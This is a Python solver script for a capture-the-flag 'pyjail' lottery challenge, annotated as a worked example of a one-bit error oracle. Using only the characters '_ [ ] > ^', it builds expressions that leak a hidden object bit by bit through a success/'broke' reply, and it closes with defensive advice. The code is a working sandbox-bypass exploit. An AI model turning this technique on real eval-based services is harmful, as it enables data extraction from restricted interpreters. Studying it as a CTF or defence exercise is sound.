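# Solver for a CTF "pyjail" lottery challenge, kept as a worked example of a
# one-bit error oracle.  The script never sees the value of an expression it
# sends; it only learns whether the reply contains b"broke".  That single
# distinguishable outcome is enough to read the indexable object `_`
# (presumably the lottery numbers -- confirm against the challenge source)
# one bit at a time, using only the characters `_ [ ] > ^`.
#
# Defensive takeaway: a character allow-list is not a sandbox, and a reply
# that differs between "expression raised" and "expression succeeded" leaks
# whatever data the expression can reach.  A uniform response and a cap on
# queries per connection would narrow this channel.
#
# NOTE(review): the page lost the original indentation.  The nesting below is
# reconstructed from the control flow (every round needs its own prompt,
# recovery pass and submission); the placement of the progress print and of
# the final recv()/break after the round loop is the most plausible reading.

from pwn import remote
from tqdm import tqdm

LOCAL = True

for lucky_count in tqdm(range(5000)):
    print(f"trying {lucky_count=}")
    if LOCAL:
        r = remote("localhost", 5001, level="debug")
    else:
        r = remote("challs3.pyjail.club", 24908, level="debug")

    # The banner lists code points.  Reconnect until they are exactly the four
    # operators the payloads below are written with.
    r.recvuntil(b"your lucky numbers are: ")
    lucky_numbers = r.recvline().strip().split(b", ")
    lucky_numbers = sorted([chr(int(x)) for x in lucky_numbers])
    print(f"{lucky_numbers=}")
    if lucky_numbers != [">", "[", "]", "^"]:
        r.close()
        continue

    for count in range(2 if LOCAL else 100):
        r.recvuntil(b"cmd: ")

        def bulk_query(codes: list[str]) -> list[bool]:
            """Send each expression and return True where the reply lacks b"broke"."""
            rs = []
            for code in codes:
                r.sendline(code.encode())
                # Reading up to the next prompt keeps request and reply in step.
                res = r.recvuntil(b"cmd: ")
                rs.append(b"broke" not in res)
            return rs

        # Maps an integer to an expression that evaluates to it.  `_>_` is
        # used as False/0, and `[expr][_>_]` (a one-element list indexed at 0)
        # stands in for parentheses, which are not in the allowed characters.
        # NOTE(review): the seed for 1 is `_[0] > 0`, so it presumably relies
        # on the first element being non-zero.
        payloads = {
            0: "[_>_][_>_]",
            1: "[_[_>_]>[_>_][_>_]][_>_]",
        }

        def get_code(index: int) -> str:
            """Build the probe for bit `index % 8` of element `index // 8` of `_`.

            The probe is `[[]][(v ^ 1) > v]` with `v = _[byte] >> bit`: the
            index is 0 when the low bit of `v` is set and 1 (out of range, so
            the expression raises) when it is clear.

            Raises:
                KeyError: no expression for the byte index is known yet.
            """
            bit_index = index % 8
            byte_index = index // 8
            # Explicit check instead of `assert`, which is stripped under -O.
            if byte_index not in payloads:
                raise KeyError(f"no payload evaluates to index {byte_index}")
            index_code = f"[_[{payloads[byte_index]}]{('>>' + payloads[1])*bit_index}][_>_]"
            code = f"[[]][{index_code}^{payloads[1]}>{index_code}]"
            return code

        recovered = [None] * 128

        # Bootstrap: indices 0 and 1 are the only ones expressible at first.
        # Each recovered value becomes a new expressible index.
        res = bulk_query([get_code(i) for i in range(8)])
        recovered[0] = sum((1 << i) for i, b in enumerate(res) if b)
        payloads[recovered[0]] = f"_[{payloads[0]}]"
        res = bulk_query([get_code(i) for i in range(8, 16)])
        recovered[1] = sum((1 << i) for i, b in enumerate(res) if b)
        payloads[recovered[1]] = f"_[{payloads[1]}]"
        print(recovered)

        def expand_payloads() -> None:
            """Grow `payloads` to a fixed point under right shifts and XOR.

            Every recovered element contributes its successive right shifts,
            and every pair of known values contributes their XOR.  The dict is
            mutated in place, so no `global` declaration is needed.
            """
            while True:
                keys_num = len(payloads)
                for byte, value in enumerate(recovered):
                    if value is None:
                        continue
                    tmp = f"_[{payloads[byte]}]"
                    while value > 0:
                        if value not in payloads:
                            payloads[value] = f"[{tmp}][_>_]"
                        tmp = f"{tmp}>>{payloads[1]}"
                        value = value >> 1
                # Snapshot the keys: the dict grows while the pairs are walked.
                for x in list(payloads.keys()):
                    for y in list(payloads.keys()):
                        value = x ^ y
                        if value not in payloads:
                            payloads[value] = f"[{payloads[x]}^{payloads[y]}][_>_]"
                if len(payloads) == keys_num:
                    break

        # Alternate between widening the set of expressible indices and
        # reading every element that has just become reachable.
        while True:
            changed = False
            expand_payloads()
            for byte, value in enumerate(recovered):
                if value is not None:
                    continue
                if byte not in payloads:
                    continue
                changed = True
                res = bulk_query([get_code(8 * byte + i) for i in range(8)])
                recovered[byte] = sum((1 << i) for i, b in enumerate(res) if b)
                payloads[recovered[byte]] = f"_[{payloads[byte]}]"
            print(recovered)
            if not changed:
                break

        # Formatting None with `02x` would fail with an opaque TypeError; say
        # which elements stayed unreachable and release the socket instead.
        missing = [i for i, x in enumerate(recovered) if x is None]
        if missing:
            r.close()
            raise RuntimeError(f"could not recover elements at indices {missing}")

        r.sendline(b"submit")
        r.recvuntil(b"lottery numbers? ")
        r.sendline("".join(f"{x:02x}" for x in recovered).encode())

    print(r.recv())
    # Close the connection explicitly rather than leaving it to interpreter exit.
    r.close()
    break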